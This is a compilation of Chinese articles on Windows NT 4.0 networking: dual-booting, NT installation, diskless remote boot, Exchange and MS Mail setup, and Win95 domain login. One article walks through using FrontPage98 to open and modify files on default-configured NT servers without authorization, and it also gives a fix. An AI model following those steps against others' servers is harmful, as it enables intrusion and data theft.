---- 编辑boot.ini，在文件最后加入c:\=MicrosoftWindows
---- 键入attribc:\boot.ini+r+s
---- 重新启动，您就拥有了NT和WINDOWS95的选项了。使用这种办法，系统分区（C：）必须为FAT格式。

---- 问：可以不使用引导软盘或临时文件来安装NT吗？

---- 答：在许多新的BIOS中可以将IDECDROM设置为启动设备，NT安装媒介的最新版本提供直接从光盘启动所需的文件。如果您的BIOS支持光盘启动只需将光盘插入，便可启动计算机。如果您使用的是SCSI光驱，如果SCSIBIOS支持的话（如Adaptec中），也可以从光盘启动。如果您不能从光盘启动计算机，您也可以或者不使用磁盘（WINNT32/B），或者不使用临时文件进行安装，只是不可共用。在Alpha平台上，可以使用NT4.0的零售或MSDN光盘启动安装，所以安装时不需要使用启动盘或临时文件。

---- 问：怎样安装NTWorkstation4.0?

---- 答：NT的安装十分简单，以下是安装工作站并使用TCP/IP和NetBEUI连接到域的方法。插入第一张启动盘，启动计算机。插入第二张，键入回车。会提示您选择功能，按回车选择“SetupWindowsNT”。按回车进行硬件检测，并插入第三张盘。检测完成后，如果您要安装其它的驱动器，就插入OEM盘，按S选择附带的驱动器。所有的驱动器安装完毕后，阅读许可协议，使用PAGEDOWN翻页，最后按F8接受协议。系统会列出所有的磁盘和分区，在此可以创建分区。选择想要安装的分区，并按回车。系统会询问您使用的文件系统。您可以将其格式化成FAT或NTFS格式。如果你选择NTFS，系统会将其格式化为FAT，并制定任务安排在安装过程中将其转化成NTFS格式。

---- 选择目录名（默认为WINNT），按回车。让安装程序检测硬盘，按回车。一些核心文件将被复制到磁盘，您必须重启计算机。计算机重启后便进入安装的图形化部分。点击下一步，让安装程序检测PC选择安装类型。此例中我选择了自定义。系统询问您的姓名、组织（这些以后可以编辑注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT

---- \CurrentVersionkey中RegisteredOrganization和RegisterOwner的值来更改）。点击下一步。

---- 系统询问NT安装光盘包上黄色标签上的CD-KEY。输入计算机名，点击下一步。输入管理员密码，点击下一步。

---- 选择是否创建紧急修复盘，点击下一步。选择想要安装的附件，如MESSAGING，点击下一步。点击下一步开始网络设置。选择连接类型，此例中选择“通过电缆线连入网络”，点击下一步。如果选择“通过电缆线连入网络”，系统会询问网络适配器类型，您可以点击探测（DETECT）。如果系统找不到设备，点击“从列表选择”，并选择。点击下一步。选择所要安装的协议，此例中TCP/IP为NetBEUI，点击下一步。显示网络服务，点击下一步。如果您安装TCP/IP，系统会询问是否使用DHCP。DHCP是TCP/IP地址根据需要由系统自动分发的过程，有利于网络管理，此例中选择否。键入IP地址、子网掩码、和网关。点击DNS标签可以指定DNS服务器，加入您的网络。（如：savilltech.com）。点击确定。点击下一步设置服务。点击下一步运行网络。网络运行后系统将询问您要在工作组中运行还是在域中。点击域复选框，键入域名。如果域管理员已经使用服务器管理器将您计算机的名称添加到域中，则只须点击下一步。否则点击在域中创建帐号，键入域管理员名称和密码。点击完成。

---- 选择时区，点击关闭。最后一步为检测您的显示卡。如果正确，点击确定。如果错误检测则点击取消，而使用标准VGA驱动程序。点击重新启动计算机。这样就完成了NT工作站的安装:-)。

---- 问：怎样安装NT和Linux?

---- 答：Linux有一个称为LILO的启动引导管理程序，是独立的工具。它将Linux引导到native和EXT2分区，和任何其它的位于FAT16分区的DOS/WIN引导映射。无论是DOS、WIN95还是NT，它都可以引导，只要NT安装在FAT16分区，LILO没有任何问题。显然，最新的Linux的kernel有FAT32支持，所以这也是一种选择。事实上Linux支持FAT16，可以在其文件系统中装配FAT16的分区，可依您的需要访问DOS/WIN的文件。除了LILO外的另一个选择是Grub，可以在http://www.uruk.org/~erich/grub下载。即使NT安装在NTFS分区上，Linux和WINDOWSNT也能正常运行。您需要在linux的fdisk中为其驱动器设置为flaggedbootable，而不是将NT。然后安装LILO，选择启动Linux分区和NT（在LILO中为OS/2）。这样您既拥有了Linux又可使用NT，同时有NTFS分区。LILO必须驻留在Linux的引导区，而不是MBR。

---- 另一个方法是：正常安装NT。从http://www.winimage.com/bootpart.htm下载免费的工具软件，bootpart.exe。安装Linux，保证LILO没有被安装在MBR，而是在Linux的引导区。启动NT。运行命令行：CMD.EXE。运行BOOTPART.EXE，将Linuxbootsector添加至NT-OSLOADER。（这甚至在NTFS格式的NT引导区中也奏效）

返回


NT网的无盘工作站远程登陆

《一键清理系统垃圾》

NT网的无盘工作站远程登陆

    远程启动服务是 Windows NT Server 的一项功能，它支持远程工作站使用服务器硬盘上的软件启动 MS-DOS 和 Windows。使用远程启动服务可以增加网络安全性，并提供给网络系统管理员更大的控制权, 具有容易集中升级软件，降低购买和维护工作站的成本等优点。目前，在NT网络资料中还没有涉及到模板配置文件中不存在的一般网卡的远程启动配置资料，大家都很关心如何解决它的配置问题。
  下面作者以中文NT Server 4.0 为例, 介绍NT网络中使用一般网卡(无盘)工作站的远程启动安装过程, 供大家参考。

      一、在NT服务器上网络“协议”中加入 DLC 通讯协议和 NetBEUI 通讯协议，因为远程启动服务要请求 DLC 通讯协议和 NetBEUI 通讯协议；在网络的“服务”中加入远程启动服务。
      二、在网络“服务”中启动远程启动服务，运行“远程启动管理器”，首先取得(无盘)工作站的网卡ID号, 然后为其建立轮廓文件和远程启动数据库记录，这点正是一般网卡配置的难点。过程如下:
      1)取远程工作站的网卡ID号
      A)打开远程工作站。工作站实际上不启动，但带Boot-ROM的网卡向服务器发送启动请求。
      B)在服务器端“远程启动管理器”的“查看”菜单上，单击“刷新”。这时远程工作站的网卡记录就会出现,这个网卡记录包括了被启动的远程工作站的网卡ID号。若此网卡不是模板文件中指定的网卡,则会在网卡号之后出现无确定标识提示,这时需要手动设置。以Accton EN166x网卡为例,此卡与NE2000卡兼容,可按NE2000卡来配置。过程如下:
      ①将NT SERVER光盘上clients\ rpl\ update目录拷贝到硬盘上, 修改目录中的Ne200cpt.rpl文件,将其中NE2000-compatible的ID 号004033改为Accton EN166x网卡的ID号 0000E8;
      ②在DOS窗口中,键入 RPLCMD <Ne200cpt.rpl ,生成新的网卡数据库。这时再回到“远程启动管理器”中,就可看到网卡标识已更改为 NE2000 Compatible;
      2)建立(无盘)工作站的轮廓文件
  在“远程启动管理器”中,打开“配置”菜单，单击“检查配置”，这样可以检查远程启动工作站的可用操作系统，若在rpl\ rplfiles\binfiles\dos622目录中拷入了　　DOS622系统文件，则在“新建配置文件”对话框的配置框中出现DOS622的有关选项;单击“修复安全性”，则将覆盖\system root\RPL 目录中的权限，为远程启动工作站创建账号及创建RPLUSER本地账号，并更新远程启动工作站中 Lanman.ini 文件中的域项以便与服务器自身的域/工作组匹配。然后在“远程启动”菜单中，单击“新建配置文件”，其对话框如图1所示。 在“配置文件名”框中，键入配置文件名；在“配置”框中，选择与你的网卡及指定操作系统相一致的某种配置。比如3Com EtherLink III 网卡就选择 DOS6.22 3Com EtherLink III ACCTON EN166x 网卡就选择 DOS6.22 Novell NE2000。
      3)为工作站建立远程启动数据库记录
      在“远程启动管理器”中,选择一个网卡记录,并在“远程启动”菜单上，单击“转换适配器”。
      A)在“工作站名”框中，键入工作站名，用这个名字就为远程工作站建立一个NT用户帐号。
      B)在“说明”框中，键入工作站说明。框中已有网络适配器自身提供的说明。
      C)选定两类配置之一 。若此工作站与其它工作站共享配置文件，则选择“共享”；若此工作站必须使用配置文件的个人副本以便自定义工作站环境，则选择“个人”。
      D)在“配置文件中的工作站”框中，为该工作站选择配置文件。
      E)击“添加”按钮。
      这时打开远程工作站,远程工作站就可通过NT服务器启动到MS-DOS状态，远程工作站上操作系统命令文件所在目录是: C: \ DOS, 它与服务器上的目录\ RPL\RPLFILES\BITFILE\DOS622是对应的。远程(无盘)工作站通过NT服务器可以被引导到MS-DOS状态，接下来就可以进行进一步的软件安装，如:Windows31,Windows95 及其应用程序的共享，在此就不多叙。

返回


NT网络配置不当引起网络安全一例

《一键清理系统垃圾》

NT网络配置不当引起网络安全一例

    想必喜欢网络的朋友都有过作主页的历史！FrontPage98由于她那“所见即所得”的特点倍受我们的欢迎，然而frontpage98还有一项站点管理功能你可熟悉！正是这项站点管理功能给人一种恐怖的感觉：如果你的服务器使用的NT4.0,而且你使用的是默认安装,那么你小心了我可以用FrontPage98轻轻松松的进入你的网络,盗取你网络内的所有文件,对不起,你玩完了!!!下面我将详细的告述你这个MicroSoft的"bug"
    打开你的"FrontPage 浏览器",打开文件菜单(如图1)所示

    点击"开启FrontPage 网站"你能看到如图2的画面,在点击"其他网站"出现如图3所示,如图3所示输入你要访问的网址,然后点击"列出网站"按钮,等一阵时间你就可以在下面的框内看到如图3所示的内容,(如果你访问的网站不是NT网络或者它的配置以改就会报错)点击下面的带开按钮试一试,你发现了什么?!!!(如图4）嘿嘿... ...你访问的网站的内容全部出现了,而且你可以任意修改、添加文件和目录，一句话“没有任何安全可言”，有的时候系统会报出一个对话框让你输入用户名和口令然后再出现我们刚才所说的目录，这个对话框虽然也有一定的作用，但是如果你仔细研究一下你还是会找出解决的办法，而且如果Microsoft留下了一个万能的东东的话(你能报证他不留？），我不用说你也明白。（Kill MicroSoft)我说的没有错吧！是不是很恐怖？！！！

    回过头来让我们看看这到底是如何产生的，微软为了方便站点的管理给Frontpage98提供了站点管理功能，在NT4.0中弄了一个名叫“Frontpage Server Administrator”的程序支持FrontPage98的访问功能(你可以直接在NT4。0的管理菜单中找到它），虽然在NT4.0中运行它看不到什么特别的东西，但是如果你在95或者98系统你就可以看到一些让人感兴趣的东西（大值得研究一下）。

    再让我们看看如何来防范这个问题：很简单你直接在你的NT4.0中把我上面所说的那个叫“Frontpage Server Administrator”的东西del 就行了，但是经后你就不能通过FrontPage98管理你的竹叶了；还有一种方法可以让你继续使用FrontPage98管理站点，但是这种方法（就是我们上面说的出现一个让输入用户和口令的对话框的方法）我认为也不安全就不告诉大家了！如果你的E文够好，我建议你看一下“FrontPage Server Extensions Resource Kit”这个东西，在你的浏览器中输入“C:\Program Files\Microsoft FrontPage\version3.0\serk\default.htm”就行了。如果你有什么意见和建议以及疑问欢迎e-mail给我：xuankong@swau.edu.cn。

返回


NT网上电子邮件系统的建立（二）

《一键清理系统垃圾》

NT网上电子邮件系统的建立（二）

能不能在不安装Exchang的情况下建立小型邮件系统呢，我们经过实验，提供一种可行的方法。
    1网络配置
    （1）硬件
    服务器：PⅡ300、64M SDRAM、4.3G硬盘、100M PCI网卡
    工作站：MMX 200、32M SDRAM、3.2G硬盘、10/100PCI网卡
    （2）软件
    服务器：中文Windows NT 4.0
    工作站：DOS 6.22、Windows95
    2安装电子邮件系统
    （1）邮件服务器安装
    Windows NT 4.0、Windows95的安装这里就不再重复。主要介绍邮件服务器的安装过程。
    服务器上Windows NT 4.0安装好后，顺序选取“设置”→“控制面板”→“Microsoft Mail邮局”→“创建新的工作组邮局”，然后在NT服务器上选取邮局的路径，按照提示建立管理员账号详细资料（特别注意：最好在建立后不要改变管理员信箱，本人就是因为建立后变更此信箱，不得不重新建立工作组邮局）。
    此时邮局建立完成。但有邮局没有用户，怎么办，重新顺序选取“设置”→“控制面板”→“Microsoft Mail邮局”→“管理现有的工作组邮局”，选取邮局所在的路径，在按提示输入管理员信箱和密码后进入邮局管理程序。选取添加使用者，根据提示添加用户。此时NT邮件服务器安装完毕。
    (2)工作站的安装
    安装好Windows95后，确保已经连上了NT网（特别注意：安装Windows95时，选取自定义安装，在安装组件时点取“Microsoft Exchange”）。双击“收件箱” 图标，出现收件箱安装向导，按提示输入邮局的路径，将你在服务器上新建立的邮局位置输入，按确定后出现用户名称列表。选出此信箱的用户名后按提示输入密码，最后按提示建立个人通讯簿、个人文件夹，并将收件箱添加到启动菜单上即可（主要是为了开机就启动收件箱，只要有邮件到来，就会在屏幕的右下角显示新邮件标志，方便接收邮件）。此时完成了收件箱的安装。
    再双击“收件箱”的图标 就可以收发电子邮件了。这种安装方法省去了TCP/IP烦琐的设置。
    此时NT网络上的邮件系统已安装完毕，是不是很简单，发一封邮件看看。

返回


NT网上电子邮件系统的建立

《一键清理系统垃圾》

NT网上电子邮件系统的建立

电子邮件是一种通过计算机网络与其它用户传递信息的现代通信工具。在电子邮件系统中，邮件服务器充当“电子信箱”功能，在网上建有账号的PC机通过“电子邮箱”收发与阅览各种信息。本文以笔者所在单位为例，介绍如何在NT平台上建立小型的电子邮件系统。
    1.网络环境
    本单位网络是由一台Netware服务器、一台NT服务器(电子邮件系统)、一台交换机、7台集线器、一台中继器及50台工作站组成的星型与总线型以太混和网结构。工作站分布在大楼各层办公室内。
    2.网络的软、硬件配置及网络参数
    (1)网络服务器
    硬件：Pentium 586/200、64M RAM、3.2G硬盘、24速CD－ROM、32位100M PCI网卡
    软件：DOS6.22、Windows95、Windows NT4.0 Server、Microsoft Exchange5.0 Server
    IP地址：010.031.004.001
    子网掩码：255.255.255.000
    网关：010.031.004.005
    (2)网络工作站
    硬件：586主机、16M RAM、420M硬盘、16位网卡或32位10M/100M网卡
    软件：Windows95，Microsoft Office97
    IP地址：010.031.004.010～010.031.004.254，由DHCP服务器动态分配
    网关：010.031.004.005
    3.NT服务器的安装与设置
    (1)DOS6.22及Windows95的安装
    先安装DOS6.22系统，把硬盘分成2个区并格式化，其中指定C盘为系统盘，存放DOS6.22、Windows95及NT4.0 Server启动系统，D盘存放NT4.0系统、Exchange5.0 Server系统，然后在C盘依次安装DOS6.22、Windows95系统。
    (2)重新启动机器，进入Windows95桌面，在服务器的CD－ROM上插入NT4.0 Server安装光盘，即自动进入Windows NT4.0安装。
    (3)根据屏幕提示选择定制安装，把D盘设置为NTFS文件系统格式，在Windows NT支持的许可协议上选择每客户的许可协议方式，在服务器类型上选择主域控制器，在管理员账号中输入密码。
    (4)在网卡的对话框中，双击所安装的网卡，输入网卡的I/O地址、中断号及类型。
    (5)在网络协议的配置中，选择TCP/IP、NWLINK IPX/SPX、NETBEUI协议。
    (6)在要安装的服务对话框中，从列表中选择Microsoft DHCP服务器、Microsoft TCP/IP打印、Netware网关服务、简单TCP/IP服务、NWLINK IPX/SPX兼容传输。
    (7)在Microsoft TCP/IP协议的属性中，设置服务器的网络参数如下：
    IP地址：010.031.004.001
    子网掩码：255.255.255.000
    默认网关：010.021.004.005
    (8)重新启动机器，完成NT服务器的安装。
    4.DHCP服务器的安装与设置
    (1)用管理员的身份登录NT服务器，单击“开始”，进入程序菜单后选择管理工具。
    (2)用鼠标单击管理工具下的Microsoft DHCP服务器，进入DHCP管理器的设置状态，在对话框中，选创建IP地址，输入下列网络参数：
    开始IP地址：010.031.004.010
    结束IP地址：010.031.004.254
    子网掩码：255.255.255.000
    (3)设置完毕后，回到对话框中，按“确定”钮后，重新启动机器，即完成DHCP服务器的安装。
    5.电子邮件服务器的安装与设置
    (1)用管理员的身份在NT服务器上登录，在CD－ROM上插入电子邮件服务器安装光盘，然后单击“开始”中的“运行”，输入E:\SETUP\I386\SETUP然后单击“OK”。
    (2)安装时选定制安装，在定制安装对话框中，选前3项，然后单击“Continue”。
    (3)在选择许可证方式对话框中选择每客户方式。
    (4)Organization and Site对话框选择创建一个新节点，输入组织及节点的名称，然后加以确认。
    (5)在Site Service Account对话框中，单击“Browse”后，Add User or Group对话框出现，在Names对话框中，单击所需要的Names，然后单击“Add”，再单击“OK”，屏幕就显示要输入使用的账号及口令，输入后单击“OK”。
    (6)当Microsoft Exchange Server Setup对话框出现时，提示Microsoft Exchange Server安装成功。
    (7)检查Exchange Server的Windows程序组，确保Exchange Server进程被启动和运行，确保Exchange能正常通信，然后为Exchange Server管理组设置权限。
    到此，电子邮件服务器已基本安装成功。
    6.在电子邮件服务器上创建工作站用户信箱
    (1)用管理员身份登录服务器，单击“开始”中的“程序”，再指向Microsoft Exchange，然后单击“Microsoft Exchange Administrator”。
    (2)在Connect to Server对话框中，输入你要连接的服务器，然后单击“OK”，设置为默认值。
    (3)在文件栏中，单击“New Mailbox”，Properties的对话框出现，输入要填写的信息，单击“确定”，Primary Windows NT Account对话框出现，选Erase A New Windows NT Account，单击“OK”，然后单击“确定”即完成新邮箱的建立。
    7.网络工作站登录到电子邮件服务器
    (1)首先给登录到电子邮件服务器的工作站安装Windows95系统、Office97软件。
    (2)网络管理员为登录的工作站设置登录到电子邮件服务器的域、账号、口令、邮箱及权限。
    (3)对网络工作站进行配置：
    ①双击已安装的网卡，设置及检查网卡I/O地址和中断号。
    ②对网卡的协议进行设置：在控制面板中双击“网络”，点击“添加”，选择“协议”，在列表中选择Microsoft，点击“TCP/IP”、“IPX/SPX兼容协议”、“NETBEUI”，单击“确定”，即完成配置。
    ③配置网卡的TCP/IP协议：在上述过程中，选择TCP/IP协议，然后单击“属性”，在IP地址中选择自动获得IP地址。在WINS配置中，选择禁用WINS解析。在网关中，输入010.031.004.005，再单击“添加”。在DNS配置中，选择禁用DNS(i)。在绑定中，选择Microsoft网络客户。
    ④设置登录方式：在网络的“配置”对话框中，对基本登录方式选取“Microsoft网络客户”，单击其属性，在登录验证中选择登录到Windows NT域及输入Windows NT域的名称。在网络登录项中，选取快速登录，再按“确定”。
    ⑤在访问控制项中，选择用户级访问控制，并填入用户所在组的名称。在身份验证类型中，选择Windows NT服务器。
    (4)对工作站配置邮件文件的信息服务：
    ①在Windows95的控制面板中，单击“电子邮件”，在出现配置文件安装的信息服务(I)对话框中，单击“添加”，选取Microsoft Exchange Server、个人通讯录、个人文件夹。在Microsoft Exchange Server和邮箱中填入服务器、邮箱名称，在启动时，选取与网络联接。在配置个人通讯录对话框中，输入个人通讯录及路径。在个人文件夹对话框中，输入文件夹名称、类型及路径。
    ②在上述过程中，在Microsoft Outlook属性的对话框单击“传递”，选取新邮件先发至个人文件夹。
    (5)完成上述各项工作后，启动Windows95工作站，正确输入用户名称、口令及登录的域，进入Windows95后双击“Microsoft Outlook”图标后，即可进入Outlook，从而可浏览、收发各种电子邮件等，这样就成功地建立了电子邮件系统网络。

返回


NT无盘win95安装问题精解

《一键清理系统垃圾》

NT无盘win95安装问题精解

    我安装过上十个nt无盘win95了,每一次都碰到不少问题.好在我福大命大,一一化解.现在回想起来,当初身处绝境,无人帮助的境况,好生辛酸.

    我现在就把我所遇到的问题及解决的方法写出来,为还在苦海中挣扎的兄弟点一盏灯.

    1.nt server登陆后,没有鼠标.:出现以上问题,要考虑三个方面:a.com1,com2是否在BIOS中打开,b.mouse驱动是否正确.c.是否接鼠标的com口与网卡有冲突.找到原因,解决自然简单.

    2.workstation登陆server出错"rpldisk.dsk,error in server "\\nt4",none system disk":dos工作站的登陆,一般要注意两个目录中的文件.一是\\nt4\binfiles\dos622目录,另一个是\\nt4\profiles\dos8029目录.(此处的nt4是服务器名,dos8029是dos配置文件名,因实际不同而不同)DOS622中要保证IO.SYS,MSDOS.SYS,COMMAND.COM,HIMEM.SYS的存在且正确,dos8029中要保证bootsect.sys的存在且正确.

    3.工作站进行WIN95登陆,显示"NET USE F: \\NT4\SBS ,the shared path not found":这是因为sbs目录没有设共享所至.(sbs为win95的共享文件目录)

    4.工作站进行WIN95登陆,显示"initializing workstation <0000212a4c7a>g: \\nt4\machine (error :67)error:0001 unable to connect one or more drive ":解决的方法是把machine目录设共享,(machine为机器目录).注意此处的error 67代码.

    5.工作站进行WIN95登陆后,运行command.com,报错.:这个问题,有两种解决的方法.治标的是修改dos的快捷方式为:d:\winboot\command.com,治本的是"copy \\nt4\sbs\command.com \\nt4\rpl\rplfiles\binfiles\win95\command.com."

    6.工作站dos登陆,显示"starting msdos....",停止反应.:这是因为binfiles\dos622目录下的三个基本文件出错所至.三个文件参见2.

    7.在server上用rplcmd配置好了网卡后,用rplmgr可以refesh网卡的id号,但是工作站就是登陆不了server.:这个问题是因为protocol.ini文件不正确所至.修改binfiles\netbeui\网卡目录\protocol.ini为正确设置.

    8.从一台有盘win95工作站向server copy sbs目录文件,显示"部分项目写入msbatch.inf出错":当从从一台有盘win95工作站向server copy sbs目录文件时,若中途退出.则要重新启动工作站,且server上也要删去刚才的目录及文件.否则,就会出以上错误.

    9.工作站dos登陆,出错"error int server "\\nt4 ",initial error,driver memory trached :"x".:这是因为工作站的权限太小所至,用manager放开权限即可.

    10.工作站win95启动,出错"NET USE H: \\NT4\WIN95SERROR :0001 \\NT4\MACHINE\USER19 CAN NOT CONNECT ONE OR MORE DRIVE":仔细检查该工作站的网卡ID和MACHINES.INI文件.发现该工作站被指定用USER20目录而不是USER19目录,试着把user20的信息移到machines.ini的开头,离user19远一些.问题解决. 这是个很奇怪的问题,按理说machines.ini文件是文本文件,不存在次序问题.

    11.一台工作站win95登陆,报错"xxxxxmsbachupxxxxx,vxdxxxxx",乱麻显示在screen的左上角.:这个问题困扰我最久,现在知道有四种原因会导致出错:a.网线没有做好.b.网卡的驱动程序用错了,如pci8029网卡,它的ndis程序有两个版本13.3和16.1,一定要用13.3版的.c.在进行第一台工作站安装时,制定网卡所用的资源不对.如,isa网卡一般用300和3,而win95有时会将其资源设为200和3d.在machines.ini中,把两台工作站指定到一个机器目录上了.分析出原因后,解决问题小意思.

    12.工作张win95登陆,报错"no register file is defind":这个问题和machines.ini文件有关.应当仔细检查该文件中的设定.

    13.工作站安装win95,报错"0013 error":这个问题和cmos中的软去的设定有关.

返回


NT无盘win95的调试和后期工作

《一键清理系统垃圾》

NT无盘win95的调试和后期工作

关于NT无盘win95的资料已经很多，本篇文章重点探讨无盘win95调试过程中出现的问题及其解决办法，希望能对广大网友有所帮助。

一、出现的问题及其排除

1.启动工作站时，直接从本地启动或提示“DISK BOOT FAILURE,INSERT SYSTEM

DISK AND PRESS ENTER”

原因：网卡BOOT ROM没有激活生效。

解决方法：

用网卡相应的驱动盘，运行SETUP.EXE程序，将BOOT ROM选项设为 ENABLE。如果还是不行，就检查BOOT ROM所用的内存映射地址(一般为C800或D000)是否和CMOS的显示地址冲突。

2.屏幕停留在RPL-ROM-FFC：n

原因：网络未通、或网卡资源设置冲突。

解决方法：检查网络器材(网卡﹑HUB)和介质(网络线)的工作状态，检查CMOS看是否有设置与网卡冲突。

3.屏幕停留在RPL-ROM-SFC：n

原因：工作的配置文件错或未建立

解决方法：在server运行远程启动管理器，点中刷新选项，可看到网卡的ID号码，为其指定名称和远程启动配置文件即可。

确认已将网卡*.DOS的驱动文件拷到%winnt%\rpl\bblock\ndis目录下。

确认%winnt%\rpl\bblock\netbeui目录下已经建立代表网卡的目录并将 dosbb.cnf,w95bb.cnf,protocol.ini 拷入其中。

4.出现用户名称后挂起。

原因：网卡配置参数错误或*.DOS驱动程序错误

解决方法：查看%winnt%\rpl\bblock\netbeui\xxxx\ PROTOCOL.INI(xxxx表示相应的网卡目录)文件，看其[ms2000_nif]段的IRQ和IO项的值是否与网卡的实际配置相符。

5.在DOS无盘工作站运行setup.exe时出错。

原因：SBS拷贝不全或临时目录指定错误。

解决方法：重装SBS目录。将临时目录指定到别的映射盘（指定到SBS目录内会出错）。

6.运行win95clt.bat时出错（提示找不到system.dat或lanman.ini）

原因：a.用户机器目录的SUBOOT目录不存在b.%WINNT%\RPL\RPLFILES\PROFILES\WIN95\目录下没有lanman.dos目录

解决方法：a.确认SBS目录下的msbatch.inf是运行NT光盘clients\rpl\update\win95\ win95srv.bat后拷贝过来的，然后重新运行setup.exe安装客户端的win95。

b.重新运行rplcmd重新做配置文件。

7. 远程启动WINDOWS95时，映射目录（NET USE命令）失败。

原因：网卡驱动错误或WINNT\RPL\RPLFILES\PROFILES\WIN95\SUBOOT\PROTOCOL.INI文件参数配制错误。

解决方法：检查PROTOCOL.INI 的[MS2000$]段的DriverName、INTERRUPT、 IOBASE

设置是否和网卡实际设置匹配。千万不要把%winnt%\rpl\bblock\netbeui\xxxx\目录下的PROTOCOL.INI和此处的PROTOCOL.INI混用，否则会出错。

SETMDIR运行失败，客户机挂起。

原因：a.SBS目录的machine.ini文件未建立或建立错误。B.映射盘符出错。

解决方法：a.检查machine.ini文件，看是否把网卡号添加进去，是否有格式上的错误。B.在WINNT\RPL\RPLFILES\PROFILES\WIN95\SUBOOT\WIN.BAT文件中，SETMDIR之前加入一行：

NET USE G：\\SERVER\MACHINE( 如果这里加入了这句，那么一定要把machine.ini里g=\\server\machine这句删除，映射两次会出错)。

启动win95无盘工作站加载win.com时出现乱码并死机。

原因：这个问题一般在PCI网卡上才会出现，因为拔下ISA网卡后少了一块网卡而无盘win95的注册表网卡配制未改变，引起系统在运行win.com加载网卡驱动时出现错误。

解决方法：在运行netsetup安装第二台工作站后启动同时插有ISA网卡和PCI网卡的那台机器，将ISA网卡删除重新启动后再拔下ISA网卡。

10.启动WINDOWS95报告盘符错误，

原因：安装win95时的机器不是真正的无盘DOS工作站（带有本地硬盘）。

解决方法：在真正的无盘DOS工作站上重装win95。或自己重建config.sys,autoexec.bat,win.bat文件。

11.启动windows95后出现不能读取A:盘或explorer错误

原因：不详

解决方法：按取消按钮忽略即可。

12.启动时提示有文件被更改

原因：SBS目录的文件只读属性被去除。

解决方法：把SBS目录及其子目录的文件设置为只读。

13.无盘95显示乱码

原因：有5个文件在运行win95srv.bat时被替换。

解决方法：找一个同版本的win95,将netdi.dll, suwin.exe, netdl.dll, suwin.exe,netdi.dll拷到SBS目录覆盖同名文件即可。（注意：此步做完后setup.exe便不支持无盘安装，所以这一步要在工作站全部安装完毕后才能做）。

14.无盘95不能进入msdos方式。

原因：找不到command.com或command.com版本不对。

解决方法：找一个同版本的win95，将io.sys,command.com分别拷贝到

%winnt%\rpl\rplfiles\binfiles\win95下和%winnt%\rpl\rplfiles\profiles\xxxx(xxxx是相应的配置文件名)的SUBOOT目录下（msdos.sys可以不用拷）。

15．暂时想不起来了，想起来再补充把。

二、后期软件安装

OFFICE的安装

a.管理级安装：在一台有盘站（带光驱）上将OFFICE光盘插入（之所以要用带光驱的有盘站是因为速度比较快），在开始à 运行处键入：x:\setup /a(X为光驱盘符)。

b.按提示安装

c.安装程序询问在何处共享程序文件时，请选择在服务器运行。

d.安装完毕后请将OFFICE目录设置为共享。

e.客户级安装：OFFICE共享目录中运行setup，此时除其他安装选项外，还会出现一个

“从服务器上运行的选项”，请选择此选项。

UCDOS的安装

首先确保msdos方式能用（前面已经介绍），然后将ucdos70的安装程序拷贝到服务器并设置共享，从任意一台无盘win95工作站运行install安装（要先映射一个盘符）。

因为ucdos70的knl.com根据每台机子的配置生成，其他机子运行会不正常。所以必须找一份ucdos98，将全部文件拷贝到安装好的ucdos目录中去，运行ucdos目录中的setup.exe,将直接写屏禁止。手工更改ucdos.bat，内容如下：

u: (映射好的盘符)

rd16.com

knlvga.exe (ucdos98的knl.com文件,千万不要在用ucdos7.0的knl.com了)

py.com

limd wb

rdfnt.com

还可以在桌面建立一个快捷方式，将其属性à 程序à 退出时关闭一项打钩。

ucdos,wb,wps2000安装方法在《计算机应用文摘》99增刊---网络之门中有详细说明

各种驱动程序的安装

安装各种驱动程序时只要把驱动程序源盘拷贝到SBS目录及其system目录下，然后在

重新安装驱动程序即可。注意：驱动程序源盘一定是要未压缩版的（即*.drv,*.dll而不是

.dr_ , *.dl_)。

返回


Windows 95工作站如何登录到Windows NT网络

《一键清理系统垃圾》

Windows 95工作站如何登录到Windows NT网络

    目前，以Windows 95为操作系统的PC机十分普遍。Windows 95作为一个非常成功的操作系统软件，其功能十分强大。利用Windows 95的网络通信功能不仅可以建立Windows 95对等网络，而且可以很方便地实现与Windows NT网络(简称NT网)连接。本文就Windows 95工作站如何登录到NT网络作简要介绍。
    一、硬件安装
    首先给要登录到NT网的Windows 95工作站安装上网卡，然后用电缆线将它与NT局域网连接起来。
    二、设置NT服务器
    网络管理员要在NT服务器上为Windows 95工作站设置登录到NT服务器的域和账户，并为Windows 95用户设置文件访问权限及打印限制。网络管理员还要提供以下资料：
    1.NT服务器及Windows 95登录域的名字
    2.访问网络所用协议、网关、子网掩码
    3.Windows 95工作站的IP地址、账户和口令
    三、配置Windows 95工作站
    1.安装Windows 95网络软件
    如果要连网的PC机中已经安装了Windows 95网络软件，则可以跳过这一步，否则执行下面操作。
    单击“开始”按钮，指向“设置”，然后单击“控制面板”，进入控制面板后，双击“添加/删除程序”，选择“安装Windows 95”。在组件栏中选择安装“The Microsoft Network”后选择“确定”。完成网络软件的安装。
    2.安装网卡驱动程序
    选择“开始|控制面板|网络|配置”，进入“配置”窗口。选“添加”，进入“选定网络组件类型”对话框；选择“适配器”，单击“添加”，进入“选定网络适配器”对话框，在列表中选择所用网卡的驱动程序，若列表中没有要选的驱动程序，则单击“从磁盘安装”并插入含有所需驱动程序的磁盘，选择所需驱动程序，单击“确定”完成安装。
    3.安装协议
    在“网络”的“配置”窗口选择“添加”，进入“选定网络组件类型”对话框；选择“协议”，单击“添加”，在列表中选择所用协议(必须保证该协议与NT网中使用的协议一致)，若列表中没有要选的驱动程序，则单击“从磁盘安装”并插入含有所需协议的磁盘，选择所需协议，单击“确定”完成安装。
    4.配置网卡
    在“网络”的“配置”窗口选择适配器，单击“属性”对网卡属性进行设置。驱动程序类型选取“增强模式的NDIS驱动程序”，对使用协议进行“绑定”，资源选择“基本设置0”。
    5.配置协议
    在“网络”的“配置”窗口选择协议，单击“属性”对协议属性进行设置。在“IP”地址项依次输入本机的IP地址及子网掩码，在“网关”项输入网关号码，在“DNS配置”中选“启用DNS(E)”并再分别输入NT服务器的名字及Windows 95工作站登录到域的域名和DNS服务器的搜索顺序，在“绑定”项选中选“微软网络客户”及“微软网络的文件和打印机共享”。
    6.设置登录方式
    在“网络”的“配置”窗口的基本网络登录方式中选“Microsoft网络客户”。设置完毕，重新启动计算机使设置有效。
    四、访问网络
    正确完成以上各步工作后，启动Windows 95工作站，即可对网络进行联接访问。
